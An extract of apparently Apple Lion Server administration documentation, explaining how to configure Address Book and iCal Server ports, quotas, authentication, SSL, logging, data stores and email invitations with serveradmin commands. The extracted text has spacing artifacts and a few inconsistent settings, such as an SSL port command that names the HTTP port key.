1. Use serveradmin via the Terminal app to change the setting. sudo serveradmin settings addressbook:HTTPPort = "<PortNumber>" The default value for <PortNumb er> is 8800. Command example: sudo serveradmin settings addressbook:HTTPPort = "8841"
2. Res tart Addres s Book s ervice. sudo serveradmin stop addressbook sudo serveradmin start addressbook
Change Address Book service user quotas

Each Addres s Book user has a disk quota. This quota is the total poss ible size of all the users addres s books and vCards. Quotas arent set on a per-user basis. They are set globally for all us ers. Each of those s ettings als o affects the calendar server. Dont let the total of all your users quotas exceed the storage capacity of the data store.
1. Use serveradmin via the Terminal app to set the quota limits . sudo serveradmin set addressbook:MaxCollectionsPerHome = "<Number>" sudo serveradmin set addressbook:MaxResourcesPerCollection = "<Number>" sudo serveradmin set addressbook:MaxResourceSize = "<FileSize>"
Key MaxCollectionsPerHome
Description the maximum number of address books a user can create
Default v alue 50
MaxResourcesPerCollection
the maximum number of contacts that a user can create in each address book.
10000
MaxResourceSize
the maximum size in bytes of each contact
1048576
Command example: sudo serveradmin set addressbook:MaxCollectionsPerHome = "100" sudo serveradmin set addressbook:MaxResourcesPerCollection = "12000" sudo serveradmin set addressbook:MaxResourceSize = "209715200" 2. Res tart Addres s Book s ervice. sudo serveradmin stop addressbook sudo serveradmin start addressbook
Choose and enable secure authentication for Address Book server

Users authenticate to Addres s Book Server through one of the following methods :
Authentication type Kerberos v.5 Description T his method uses strong encryption and is used in Mac OS X Lion for single sign-on to services offered by Lion Server. It is the recommended authentication method supported by Lion Server. Selecting this method requires the exclusive use of Kerberos authentication. Digest T his is HT TP Digest access authentication (RFC 2617). It features good encryption of user passwords over the network without the use of a trusted third-party (like the Kerberos realm), and is usable without maintaining a Kerberos infrastructure. Selecting this method requires the exclusive use of Digest authentication. Basic T his is plain text authentication.
Use serveradmin via the Terminal app to enable MD5 Diges t authentication.
sudo serveradmin set addressbook:Authentication:Digest:Enabled = "<setting>" The default value for <setting> is yes. Command example: sudo serveradmin set addressbook:Authentication:Digest:Enabled = "yes" Use serveradmin via the Terminal app to enable Kerberos authentication. sudo serveradmin set addressbook:Authentication:Kerberos:Enabled = "<setting>" The default value for <setting> is yes. Command example: sudo serveradmin set addressbook:Authentication:Kerberos:Enabled = "yes" If you choose Kerberos authentication, make sure you set the Kerberos principal via the Terminal app. sudo serveradmin set addressbook:Authentication:Kerberos:ServicePrincipal = "<hostname>" The default value for <hostname> is blank, meaning it is set for the localhost. Command example: sudo serveradmin set addressbook:Authentication:Kerberos:ServicePrincipal = "SAMPLE.REALM.EXAMPL Use serveradmin via the Terminal app to enable plain text authentication. sudo serveradmin set addressbook:Authentication:Basic:Enabled = "<setting>" The default value for <setting> is no. Command example: sudo serveradmin set addressbook:Authentication:Basic:Enabled = "yes" Res tart Addres s Book s ervice. sudo serveradmin stop addressbook sudo serveradmin start addressbook
Enable secure network traffic for Address Book server

When you enable Secure Sockets Layer (SSL), you encrypt all the data sent between Addres s Book Server and the client. To enable SSL, you must s elect a Certificate. If you us e the Default s elf-signed certificate, a client must choose to trust the certificate before it can make a secure connection. You can use a certificate on the server, or choos e to us e a certificate on another computer.
Use serveradmin via the Terminal app to change the SSL port number. sudo serveradmin set addressbook:SSLPort = "<PortNumber>" The default value for <PortNumb er> is 8443. Command example: sudo serveradmin set addressbook:SSLPort = "8882" Use serveradmin via the Terminal app to set the pem SSL certificate source location. sudo serveradmin set addressbook:SSLCertificate = "<CertLocation>" The default value for <CertLocation > is /etc/certificates /. Command example: sudo serveradmin set addressbook:SSLCertificate = "/etc/certificates/"
Use serveradmin via the Terminal app to set the pem private key source location. sudo serveradmin set addressbook:SSLPrivateKey = "<PrivateKeyLoc>" The default value for <PrivateKeyLoc> is /etc/certificates /. Command example: sudo serveradmin set addressbook:SSLPrivateKey = "/etc/certificates/" Use serveradmin via the Terminal app to set the pem authority chain file source location. sudo serveradmin set addressbook:SSLAuthorityChain = "<ChainFile>" The default value for <ChainFile> is /etc/certificates/. Command example: sudo serveradmin set addressbook:SSLAuthorityChain = "/etc/certificates/" Use serveradmin via the Terminal app to redirect insecure reques ts to the SSL port, if needed. sudo serveradmin set addressbook:RedirectHTTPToHTTPS = "<setting>" The default value for <setting> is no. Command example: sudo serveradmin set addressbook:RedirectHTTPToHTTPS = "yes" Res tart Addres s Book s ervice. sudo serveradmin stop addressbook sudo serveradmin start addressbook
Monitoring Address Book
Change the Address Book server logging level

The default logging level for Address Book Server is Warning. The Warning level of logging provides the secondlowest level of detail. You can change this to the lowes t level (Error) or a higher level (Info or Debug).
1. Use serveradmin via the Terminal app to change the log level. sudo serveradmin set addressbook:DefaultLogLevel = "<LogLevel>" The default value for <Level > is warn. Replace LogLevel with one of the following: error warn info debug Command example: sudo serveradmin set addressbook:DefaultLogLevel = "debug" 2. Res tart Addres s Book s ervice. sudo serveradmin stop addressbook sudo serveradmin start addressbook
View Address Book server logs

You can view and filter the logs to troubleshoot the service or monitor overall s ervice reliability. Address Book Server keeps two logs: one for access (/var/log/caldavd/access .log) and one for errors (/var/log/caldavd/error.log). It shares its logs with the calendar service logs.
Use one of the following command-line tool to read the log files: less or cat to view the logs, or use tail to actively watch changes to a log file. For example, to track the error log: tail -f /var/log/carddavd/error.log For more information about using these command-line tools, s ee their man pages.
View Address Book server vital status

You can find information about the s tate of Address Book Server, including whether its running, when it s tarted running, and how many requests are being made, using the command line.
Use serveradmin via the Terminal app to see vital statis tics about the service. sudo serveradmin status addressbook
Calendar serv ice
Understanding Calendar
Manage shared calendars

iCal Server is the shared calendar s ervice. Built on open standard protocols , iCal Server provides integration with leading calendaring programs . Its easy to share calendars, schedule meetings, and coordinate events in a workgroup, a small busines s, or a large corporation. iCal Server provides a full calendaring s olution, including: Attachments : Events can have file attachments associated with them, so every event participant can have a copy of a file or meeting agenda. Delegation (proxy) s upport: Other us ers can be authorized to view your calendar events , track subordinates , resources, or other des ignated calendar users . Proxies allow event-scheduling delegation as well. Directory support: iCal Server works with Open Directory and Active Directory to provide calendar s ervice for users. Mail notifications: Event attendees without calendar accounts can get an email invitation with event information. Event invitations : Users can invite others to an event. When the recipient acknowledges the invitation, the s cheduler gets the RSVP. Detailed access controls: iCal Server fully s upports acces s control lists (ACLs) for events and attachments . Free/bus y browsing: When s cheduling an event, a user can s ee if invitees are available to accept an invitation. Location and resource scheduling: Res ources (projectors, cars, and s o forth) and locations can have calendars and can be invited to events. Multiple calendars : Each person or resource can have multiple calendars. Us ers can organize their calendars as needed. Push notification: Changes made to calendars and events are pus hed to clients immediately. Server-side scheduling: Event invitations are processed on the server, freeing the client for better performance. Before starting iCal service, you might need to update your networks DNS records .
Start iCal service 1. In the Server app s idebar, s elect the service you want to start. 2. Click the On/Off switch to turn on the service. 3. If a dialog asks whether you want to allow Internet acces s to the s ervice you turned on, click Allow to configure your AirPort device and make the service acces sible to Internet users. Click Dont Allow if you dont want the service to be access ible to computers on the Internet, or if youre not sure. You can change Internet acces s to s ervices later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login. The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device.Thes e services include Address Book, iCal, iChat, Mail, and Web. If you have an Internet router that is nt lis ted in the Server s idebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For Information, see Router port mapping. Add users, if needed 1. In the Users pane of the Server app, click the Add button (+). 2. In the Full Name field, enter the users name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces . 3. In the Account Name field, enter the us ers short name. If you dont want to use the generated short name, enter a different short name. After the account is created, you cant change this s hort name. The short name typically is eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen). Note: If a user has a s hort name on a Mac, try to use the same short name for the users account on the s erver. Having the same s hort name helps with the users access to services. 4. Enter the users pas sword in the Pass word and Verify fields . You can use Pas sword Ass is tant to help you choose a pass word. Click the button at the right of the Pass word field to see how s ecure the password is. The us er can change this password in the Users & Groups pane of System Preferences on the us ers computer. 5. To associate a picture with the user account, click the silhouette and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computers camera or choos e a graphic file on your computer. After taking or choos ing a picture, you can drag the picture to pan it, or us e the slider to zoom it. When you finish customizing the picture, click Set. 6. Click Done to create the user account. Create iCal resources and locations Users and groups arent the only parts of a calendaring system. Res ources like projectors , microscopes , or cameras , and locations like conference rooms or buildings, must be s cheduled, but they cant keep their own calendar. These res ources and locations are like us ers and groups. They accept event invitations , and they have scheduling cons traints. Therefore, they exist as principal entities on the calendar s erver for other users and groups to include in event invitations. Using the Server app, you can make a calendar for each resource and location in your organization. To have a delegate (or proxy) manage a location or resource calendar, the user of the iCal service mus t already exis t before ass igning delegate roles. Created locations and resources are reservable and can be set to accept event invitations automatically or through a delegate. 1. Click Add (+) to add a location or resource. 2. Enter the calendar type:
Location Res ource 3. Enter a name for the location or resource. 4. Choose how the location or res ource will accept event invitations and mark the event as Busy. Automatically Makes the calendar accept all invitations in which theyre received. With Delegate Approval Holds event invitations until the designated delegate approves the invitation. You must provide a delegate. 5. Choose a delegate for the location or resource. Delegates are required, if the location or res ource is set to accept invitations with delegate approval. Delegates can also view and edit the resource calendar, even if they dont approve invitations. The delegate must be an existing iCal Server user or group. Only one delegated user or group can be assigned. Enable email invitations Attendees can be invited via email if they dont have an iCal Server account. When us ing the mail service on the same s erver as iCal s ervice, iCal Server is already configured to send email notifications. All you have to do is to turn on mail notifications and mail service. When an event attendee is added by email address and the host name of the email address isnt the s ame hos t name as the calendar server, iCal Server can send a message to the attendee with the event information. iCal Server must have its mail account in the mail system. iCal Server must be able to s end mail to an outgoing mail s erver (an SMTP server) for relay, so you need the SMTP server host name and listening port. You must als o make sure there are no firewalls blocking acces s to the mail server from the calendar server. The SMTP server must be configured to relay mail from the calendar server as well. iCal Server als o requires access to an incoming mail server, POP or IMAP, for invitation notifications. These instructions as sume the mail s ervers are configured and functioning. Email notifications can only be exchanged with external users . Users with an account on your iCal Server will receive a standard invitation in their calendar client software. 1. Create an email user account in the mail system, and note the mail address , account name, and password. For example, the iCal Server could access the account ical_s erver@example.com. If you need help creating a us er account and giving it mail access , see Create a user account. 2. If you aren't using the same s erver to s end mail and server calendars , get the following settings for the incoming Mail server from the mail adminis trator:
Setting information Server protocol Email address Host name Listening port Does mail service use SSL? User name and password Example POP or IMAP ical_server@example.com mail.example.com 143 yes or no a user name like ical_server@example.com
3. If you aren't using the same s erver to s end mail and server calendars , get the following settings for the outgoing (SMTP) Mail server from the mail administrator:
Setting information Host name Listening port Example smtp.example.com 25
Does mail service use SSL? User name and password Required authentication method, if any
yes or no a user name like ical_server@example.com CRAM-MD5 or Kerberos
4. In the Server app, select the iCal Server pane. 5. Select Allow invitations us ing email addresses. 6. If you aren't using the same s erver to s end mail and server calendars , click Edit to configure the settings. 7. Enter the Mail server information, and then click Next.
RELATED TOPICS
About calendar resources and locations Delete iCal resources and locations
Calendar serv ice
About iCal Server configuration tools

iCal Server uses any of four front-end tools. All thes e tools read from a configuration plist file (/etc/caldavd/caldavd.plist) to s et s ervice parameters . The plist file is an XML property lis t that specifies s erver options such as : The network TCP port to bind to Whether to use SSL The names and locations of support files
Tool Server app Description An app that focuses on easy configuration using built-in default settings. A command-line tool used to automate service configuration tasks and remote administration.
serveradmin
caldavd
A command-line tool used for the command-line interface of Darwin server.
calendarserver_manage_principals
A command-line tool used to add locations and resources to your iCal server.
calendarserver_purge_principals
A command-line tool used to remove locations and resources to your iCal server.
Calendar serv ice
Account settings for iCal clients

To add an iCal Server account to iCal, you mus t know the following s ettings for the user name and calendar server location. Some of these settings are us able by other CalDAV clients. For all accounts The calendar us ers short name For example, John Doe might have johndoe as a short name. The calendar us er login name The calendar us er login name takes the form of <calendar us ers short name>@< iCal Server domain name> in iCal. The iCal Server domain name
This domain name is the fully qualified domain name of the calendar server (for example, cal.example.com). You can use only the domain name (for example, example.com) if the domain has an SRV DNS record for calendar service. The iCal Server port number This is the TCP port that the iCal Server is listen on. Whether the iCal Server uses SSL encryption or not The calendar account location for account creation If automatic discovery fails, the account URL is http://server:port/principals/users/username/ If the calendar client doesnt support automatic dis covery (like Mac OS X v10.5 iCal 3.0), the account URL is http://server:port/calendars/__uids__/<<GUID>> where GUID is the users globally unique identifier. Optional The user GUID The user GUID is a Dis tributed Computing Environment (DCE) compatible universally unique identifier string created by the directory service for a user when his or her directory record is created. It usually looks something like this : 95432C72-0035-4399-9447-8531601AA699.
Calendar serv ice
About backing up and restoring calendar files

In addition to backing up the configuration files, you should back up the data s tore. The location of the data store is shown in the Settings tab of the iCal Server administration pane of Server Admin. Because iCal Server files are both postgres databas e and flat files, you need to use a backup procedure that backs up both kinds of files. You should maintain the original files POSIX permiss ions and ACL entries. Your backup solution mus t preserve extended attributes . You dont need to back up calendar database files in the file hierarchy. They are dis pos able. Your backup software needs root acces s to the /Library/Server/Calendar and Contacts/ folder (or whatever path you configured using serveradmin) and its subfolders to back them up. Lion Server provides several command-line tools for data backup and restoration: pg_dump. Use to generate a text file with SQL commands that, when fed back to the s erver, will recreate the database in the same state as it was at the time of the dump. psql. Us e to read in the text files created by pg_dump. rsync -E. Us e to keep a backup copy of your data in sync with the original. The -E flag is mandatory because it preserves file extended attributes. The rsync tool only copies files that have changed, but always copies extended attributes . ditto. Use to perform full file-level backups. asr. Use to back up and restore a volume at disk block-level. Ifasrdegrades to file copy mode, rather than block copy mode, it does not copy necessary extended attributes. Make sureasris performing a block copy, not a file copy. cp and scp. Use thes e tools to copy files and preserve extended attributes for iCal Server. tar, pax, and gzip. Us e these tools to archive and compress data for use with iCal Server. Note: You can use the launchctl command to automate data backup using the mentioned commands. For more information about using launchd, see its man page.
Calendar serv ice
About administration configuration files
Administer iCal Server us ing the Server app, or serveradmin. If the Server app, or serveradmin are unavailable, you can configure and run iCal Server from the command-line, using built-in tools. The following files are used to run iCal Server: /etc/caldavd/caldavd.plist: The main configuration file for caldavd The file contains an XML property lis t of server options and provides information s uch as the port to bind to and whether to use SSL. You can specify the names of other files . /var/log/caldavd/access .log: The servers main log file /var/run/caldavd.pid: The servers process ID file /usr/s hare/caldavd: Implementation and s upport files
Calendar serv ice
Understanding the data store and file hierarchy for iCal Server
Calendar event data is stored in a pos tgres databas e, with some s upport files in the file system. This is different from Snow Leopard Server, where all calendar data files were s tored on the file sys tem. Now only attachments and the proxy database are stored on the file system. All other calendar data is s tored in a databas e. When backing up calendar server files, make s ure to back up the /Library/Server/Calendar and Contacts/ directory and the pos tgres databases. Database files iCal Server uses databas e files for various purposes. It uses a postgres databas e to s tore calendar data. It us es sqlite files to store proxy relations hips. To troubleshoot or resolve problems, an administrator needs to use postgres database queries. Teaching postgres database manipulation is beyond the scope of this topic. To acces s the database, you need to us e postgres and pg_ctl command-line tools. File system files By default, the root data store location is /Library/Server/Calendar and Contacts/, but you can s pecify another location us ing the serveradmin command-line tool. When setting this path in the command line tool, it is an absolute path. The Calendar and Contacts folder contains 2 folders : Data and Documents. When setting the location of these two folders in the command line tool, the paths are relative to the root data s tore location. The Data folder contains the sqlite databas es for proxies, and an xml list of resources and locations in the calendar s ystem. The Document folder contains event attachments. To acces s the files, you need root access to the /Library/Server/Calendar and Contacts / folder and its subfolders (or whatever path you configured using serveradmin).
Calendar serv ice
Calendar proxies and delegates

Users can create and remove calendar events in their own calendars in iCal Server. When users want to have someone else edit their personal calendars, they delegate (or ass ign a proxy for) calendar management. iCal Server s upports calendar viewing and editing delegates, allowing designated persons to read or write a users calendars. Calendar delegation isnt configured on the s erver side. To set up a us er or group delegate, you use calendar client s oftware. You use the Server app to choose delegates for res ource and location calendars. To learn how to configure calendar delegation, see the documentation for your calendar client.
Calendar serv ice
Configure Calendar
Setting the iCal Server Host Name

When setting up iCal Server, you s pecify the host name of the iCal server. Configure the service to use a fully qualified domain name. It should be a fully qualified domain name matched with a reverse lookup record. If left blank, the calendar server defaults to the local hos tname. Make this change in the DNS SRV records before completing this step.
sudo serveradmin set calendar:ServerHostName = "hostname" Use a fully qualified domain name for hostname . sudo serveradmin s et calendar:ServerHostName = "cal.example.com"
Calendar serv ice
Configure Calendar
Setting the iCal Server port number

You can change the network port numbers than iCal Server uses. When setting up iCal Server, the server is s et to us e TCP port 8008 for unencrypted connections and 8442 for SSL connections.
Use serveradmin via the Terminal app to change the unencrypted connection setting. sudo serveradmin set calendar:HTTPPort = "<PortNumber>" The default value for <PortNumb er> is 8008. Command example: sudo serveradmin set calendar:HTTPPort = "9009"
Use serveradmin via the Terminal app to change the SSL connection setting. sudo serveradmin set calendar:HTTPPort = "<SSLPortNumber>" The default value for <SSLPortNumb er> is 8443. Command example: sudo serveradmin set calendar:HTTPPort = "8484"
Calendar serv ice
Configure Calendar
Set iCal push notification server

Apples iCal Server supports push notification for calendar invitations and events. Ins tead of having the calendar client constantly access the calendar server to search for new event invitations , the client maintains a very light network connection and the server informs the client if the client has received an event invitation, or if an event has changed. See About push notification for more information and links to related topics.
Calendar serv ice
Configure Calendar
Enable email invitations

Attendees can be invited via email if they dont have an iCal Server account. When us ing the mail service on the same s erver as iCal s ervice, iCal Server is already configured to send email notifications. All you have to do is to turn on mail notifications and mail service. When an event attendee is added by email address and the host name of the email address isnt the s ame hos t name as the calendar server, iCal Server can send a message to the attendee with the event information. iCal Server must have its mail account in the mail system.
iCal Server must be able to s end mail to an outgoing mail s erver (an SMTP server) for relay, so you need the SMTP server host name and listening port. You must als o make sure there are no firewalls blocking acces s to the mail server from the calendar server. The SMTP server must be configured to relay mail from the calendar server as well. iCal Server als o requires access to an incoming mail server, POP or IMAP, for invitation notifications. These instructions as sume the mail s ervers are configured and functioning. Email notifications can only be exchanged with external users . Users with an account on your iCal Server will receive a standard invitation in their calendar client software.
1. Create an email user account in the mail system, and note the mail address , account name, and password. For example, the iCal Server could access the account ical_s erver@example.com. If you need help creating a us er account and giving it mail access , see Create a user account. 2. If you aren't using the same s erver to s end mail and server calendars , get the following settings for the incoming Mail server from the mail adminis trator:
Setting information Server protocol Email address Host name Listening port Does mail service use SSL? User name and password Example POP or IMAP ical_server@example.com mail.example.com 143 yes or no a user name like ical_server@example.com
3. If you aren't using the same s erver to s end mail and server calendars , get the following settings for the outgoing (SMTP) Mail server from the mail administrator:
Setting information Host name Listening port Does mail service use SSL? User name and password Required authentication method, if any Example smtp.example.com 25 yes or no a user name like ical_server@example.com CRAM-MD5 or Kerberos
4. In the Server app, select the iCal Server pane. 5. Select Allow invitations us ing email addresses. 6. If you aren't using the same s erver to s end mail and server calendars , click Edit to configure the settings. 7. Enter the Mail server information, and then click Next.
Calendar serv ice
Configure Calendar
Change the calendar data store location

The data store is where the s erver s tores user calendars and event attachments. The default location is /Library/Server/Calendar and Contacts/. Change the default calendar data store location using serveradmin. If you change the data store location, you must set the proper permis sions on the new data store location. The data store location is relative to the local file system, so if the s torage location is on a network volume, enter the local filesystem mount point and not a network URL. If you have a data store fully populated with user calendars, you must move the files when you change the location. To s ee how to
move the files, s ee Unders tanding the data s tore and file hierarchy for iCal Server.
1. Create new directory, if needed. sudo mkdir new_path The default value for <new_path> is the new location of the data s tore. Command example: sudo mkdir /Volumes/NetworkDrive/CalendarData/ 2. Give the target directory the right permissions. sudo chown _calendar:_calendar new_path sudo chmod 740 new_path The value for <new_path> is the new location of the data store. Command example: sudo chown _calendar:_calendar /Volumes/NetworkDrive/CalendarData/ sudo chmod 740 /Volumes/NetworkDrive/CalendarData/ 3. Use serveradmin via the Terminal app to set the location. sudo serveradmin set calendar:ServerRoot = "<NewLocation>" Command example: sudo serveradmin set calendar:ServerRoot = "/Volumes/NetworkDrive/CalendarData/"
Calendar serv ice
Configure Calendar
Changing the maximum attachment size

The maximum attachment size is the maximum total size of all the data in an event, including text in the Notes field. Each event on a calendar has a file of a determinate size. There is no limit to the total number of external files attached to a single event except for the calendar users storage quota, and external attached files do not count against the maximum attachment size.
Use serveradmin via the Terminal app to change the file size in bytes. sudo serveradmin set calendar:MaximumAttachmentSize = "<file_size>" The default value for <file_size > is 1048576. Command example: sudo serveradmin set calendar:MaximumAttachmentSize = "2097152"
Calendar serv ice
Configure Calendar
Changing Calendar User Quotas

The calendar server has several different quota types: the maximum size in bytes for all attachments the maximum number of calendars a user can create the maximum number of events and tas ks that a user can create in each calendar the maximum size in bytes of each event or tas k You can us e the command line to change the users quota. Each calendar user has a disk quota. Quotas are not set on a per-us er basis. They are s et globally for all users. Do not allow the
total of all your users' quotas to exceed the storage capacity of the data s tore
Use serveradmin via the Terminal app to set the quota limits. sudo serveradmin set calendar:UserQuota = "<FileSize>" sudo serveradmin set calendar:MaxCollectionsPerHome = "<Number>" sudo serveradmin set calendar:MaxResourcesPerCollection = "<Number>" sudo serveradmin set calendar:MaxResourceSize = "<FileSize>"
Key UserQuota MaxCollectionsPerHome
Description the maximum size in bytes for all attachments the maximum number of calendars a user can create
Default v alue 104857600 50
MaxResourcesPerCollection
the maximum number of events and tasks that a user can create in each calendar
10000
MaxResourceSize
the maximum size in bytes of each event or task
1048576
Command example: sudo serveradmin set calendar:UserQuota = "209715200" sudo serveradmin set calendar:MaxCollectionsPerHome = "100" sudo serveradmin set calendar:MaxResourcesPerCollection = "12000" sudo serveradmin set calendar:MaxResourceSize = "209715200"
Calendar serv ice
Configure Calendar
Edit Calendar Resources and Locations using the Command Line

Users and groups arent the only parts of a calendaring system. Res ources like projectors , microscopes , or cameras , and locations like conference rooms or buildings, must be s cheduled, but they cant keep their own calendar. These res ources and locations are like us ers and groups. They accept event invitations , and they have scheduling cons traints. Therefore, they exist as principal entities on the calendar s erver for other users and groups to include in event invitations. Using calendarserver_manage_principals, you can make a calendar for each res ource and location in your organization. To us e res ources and locations with iCal Server, you need an Open Directory Master to hold the res ource and location records. If users arent authenticating to an Open Directory system (for example, if they are authenticating to an Active Directory s ystem), the resource and location records must be in an Open Directory Master server, which is bound to the users ' directory system. These settings can be changed with the calendarserver_manage_principals command-line tool. The Server app adds calendars for resources and locations to the iCal s erver, but you us e the command-line tool calendarserver_manage_principals command-line tool to choose delegates for resource and location calendars. For information on how to use calendarserver_manage_principals, s ee its man page.
Use calendarserver_manage_principals via the Terminal app to add a resource or location. sudo calendarserver_manage_principals --add {locations|resources} 'full name' --set-auto-schedul Command example: sudo calendarserver_manage_principals --add locations 'Conference Room' --set-auto-schedule=true Use calendarserver_manage_principals via the Terminal app to remove a resource or location. sudo calendarserver_manage_principals --remove {locations|resources} 'full name' Command example:
sudo calendarserver_manage_principals --remove locations 'Conference Room'
Calendar serv ice
Configure Calendar
Enable email invitations (CLI)

Attendees can be invited via email if they dont have an iCal Server account. When us ing the mail service on the same s erver as iCal s ervice, iCal Server is already configured to send email notifications. All you have to do is to turn on mail notifications and mail service. When an event attendee is added by email address and the host name of the email address isnt the s ame hos t name as the calendar server, iCal Server can send a message to the attendee with the event information. iCal Server must have its mail account in the mail system. iCal Server must be able to s end mail to an outgoing mail s erver (an SMTP server) for relay, so you need the SMTP server host name and listening port. You must als o make sure there are no firewalls blocking acces s to the mail server from the calendar server. The SMTP server must be configured to relay mail from the calendar server as well. iCal Server als o requires access to an incoming mail server, POP or IMAP, for invitation notifications. These instructions as sume the mail s ervers are configured and functioning. Email notifications can only be exchanged with external users . Users with an account on your iCal Server will receive a standard invitation in their calendar client software.
1. Set the following parameters using the Terminal. sudo serveradmin set calendar:Scheduling:iMIP:Enabled = "yes" 2. If you aren't using the same s erver for mail service, set the following parameters : sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Server = "<mail server host name>" sudo serveradmin set calendar:Scheduling:iMIP:Receiving:UseSSL = <yes or no> sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Username = "<iCal Servers user name>" sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Type = "<POP or IMAP>" sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Password = "<plaintext password>" sudo serveradmin set calendar:Scheduling:iMIP:Receiving:Port = <POP or IMAP port number> sudo serveradmin set calendar:Scheduling:iMIP:MailGatewayServer = "localhost" sudo serveradmin set calendar:Scheduling:iMIP:MailGatewayPort = 62310 sudo serveradmin set calendar:Scheduling:iMIP:Sending:Server = "<SMTP hostname>" sudo serveradmin set calendar:Scheduling:iMIP:Sending:Port = <SMTP port number> sudo serveradmin set calendar:Scheduling:iMIP:Sending:Address = "<iCal Servers user name>" sudo serveradmin set calendar:Scheduling:iMIP:Sending:Port = "<SMTP port number>"
Calendar serv ice
Configure Calendar
Adding an iCal Server account to an iCal client

If your calendar is hos ted on a CalDAV server (for example, through your workplace) you must set up your account in iCal so it can share information with the CalDAV s erver.
1. Choose iCal > Preferences and then click Accounts. 2. In the bottom-left corner of the preferences pane, click the Add button (+) to add an account. 3. From the Account type pop-up menu, s elect Automatic. 4. Enter the user short name and calendar s erver addres s. For example, John Doe (with a user short name of johndoe enters johndoe@cal.example.com. The calendar s erver addres s is the fully qualified domain name of the calendar server (for example, cal.example.com). You
can use only the domain name (for example, example.com) if the domain has an SRV DNS record for calendar s ervice. 5. Click Create. You return to the Account Information pane of the account. 6. In the Refresh Calendars pop-up menu, s pecify how often you want your computer to update the information it shares with the server (for example, to look for meeting invitations or update changes youve made to your calendar). 7. Set the general times you want to be available for meetings and events . For example, if you work part time and want coworkers to s chedule meetings with you only on weekdays between noon and 5:00 p.m., select Weekdays and enter the times in the adjacent fields . If your availability includes weekends or only some weekdays, s elect Custom, click Edit, and then make s elections to set your availability.
Calendar serv ice
Configure Calendar
Make iCal Server Host a Wiki Servers Calendar

An iCal Server can host personal calendars for another Lion Server computer that is offering wiki service. When Lion Server computer is running Wiki Server, the My Page s tarting point for wiki users can link to a built-in web calendar. The web calendar is a client for iCal Server and reads and writes to a us ers CalDAV account calendar. However, the computer providing the wiki service does nt need to also provide calendar s ervice. You can des ignate a different server to act as the calendar server. You might want to do this because: You choose to s pread services across several servers. You have a calendar server and are adding wiki service. You have a large, distributed calendar s erver infrastructure, and moving service on to the web server is impractical. When you set up iCal Server to provide the calendar service for a wiki, Wiki Server provides access to the calendars, s o users who do not have wiki privileges do not have calendar service.
Use serveradmin via the Terminal app to change the setting. sudo serveradmin set calendar:Authentication:Wiki:Enabled = "<setting>" The default value for <setting> is no. The other poss ible value is yes. Command example: sudo serveradmin set calendar:Authentication:Wiki:Enabled = "yes" Use serveradmin via the Terminal app to designate the Wiki server. sudo serveradmin set calendar:Authentication:Wiki:Hostname = "<DNSWikiServer>" The default value for <DNSWikiServer> is the Wiki server's fully qualified domain name. Command example: sudo serveradmin set calendar:Authentication:Wiki:Hostname = "wikiweb.example.com" Use serveradmin via the Terminal app to encrypt the connection. sudo serveradmin set set calendar:Authentication:Wiki:UseSSL = "(yes|no)" The default value is no. Command example: sudo serveradmin set set calendar:Authentication:Wiki:UseSSL = "yes"
Calendar serv ice
Configure Calendar
Create a calendar on an iCal Server using iCal client

You can create separate calendars for different areas of your life (work, home, s chool, and so on). iCal client makes it easy to make new calendars. If you are us ing some other calendar client (like Sunbird or Outlook), cons ult that applications help to create a calendar.
1. Select File > New Calendar > Your CalDAV calendar. If you do not select a calendar under the CalDAV account, the calendar is created locally, not on the iCal s erver. 2. Enter a name for your calendar and pres s the Return key.
Calendar serv ice
Calendar Security
About iCal Server security methods

Security for iCal Server consists of s ecuring the authentication and the data transport. Secure the authentication This means using a method of authenticating us ers that is secure and doesnt transmit login credentials in clear text over the network. The high-s ecurity authentication used pervasively in Lion Server is Kerberos v5. To learn how to configure s ecure authentication, see Secure Authentication in iCal Server. Secure the data transport This means encrypting the network traffic between the calendar client and the calendar s erver. When the transport is encrypted, no one can analyze the network traffic and reconstruct the contents of the calendar. iCal Server us es SSL to encrypt the data transport. To learn how to configure and enable SSL for iCal Server, see Secure iCal Server network traffic and Secure iCal Server network traffic (CLI).
Calendar serv ice
Calendar Security
Secure Authentication in iCal Server

Users authenticate to iCal Server through any combination of the following methods: Kerberos, Digest, or Basic. You can set the required authentication method us ing serveradmin. To enable the highest security, choose Kerberos . Digest authentication requires no additional configuration. Important: Neither the iCal app on Lion or the Calendar app on iOS support Kerberos authentication. To us e Kerberos authentication, you must have an existing Kerberos pass word authentication and encryption system in place for users . If you use Kerberos, make the relevant changes to your firewall to allow network access to the Kerberos server from the calendar server.
Authentication type Kerberos v.5 Description T his method uses strong encryption and is used in Mac OS X Lion for single sign-on to services offered by Lion Server. It is the recommended authentication method supported by Lion Server. Selecting this method requires the exclusive use of Kerberos authentication. Digest T his is HT TP Digest access authentication (RFC 2617). It features good encryption of user passwords over the network without the use of a trusted third-party (like the Kerberos realm), and is usable without maintaining a Kerberos infrastructure. Selecting this method requires the exclusive use of Digest authentication. Basic T his is plain text authentication.
Use serveradmin via the Terminal app to enable Diges t MD5 authentication. sudo serveradmin set calendar:Authentication:Digest:Enabled = "(yes|no)" The default value is yes . Command example: sudo serveradmin set calendar:Authentication:Digest:Enabled = "yes" Use serveradmin via the Terminal app to enable Kerberos. sudo serveradmin set calendar:Authentication:Kerberos:Enabled = (yes|no) The default value is no. Command example: sudo serveradmin set calendar:Authentication:Kerberos:Enabled = "yes" Use serveradmin via the Terminal app to set the Kerberos Principle hostname. sudo serveradmin set calendar:Authentication:Kerberos:ServicePrincipal = "<Hostname>" The default value for <setting> is blank, meaning the localhost. Command example: sudo serveradmin set calendar:Authentication:Kerberos:ServicePrincipal = "REALM.EXAMPLE.COM" Use serveradmin via the Terminal app to change the setting for Bas ic authentication. sudo serveradmin set calendar:Authentication:Basic:Enabled = "(yes|no)" The default value is no. Command example: sudo serveradmin set calendar:Authentication:Basic:Enabled = "no"
Calendar serv ice
Calendar Security
Secure iCal Server network traffic (CLI)

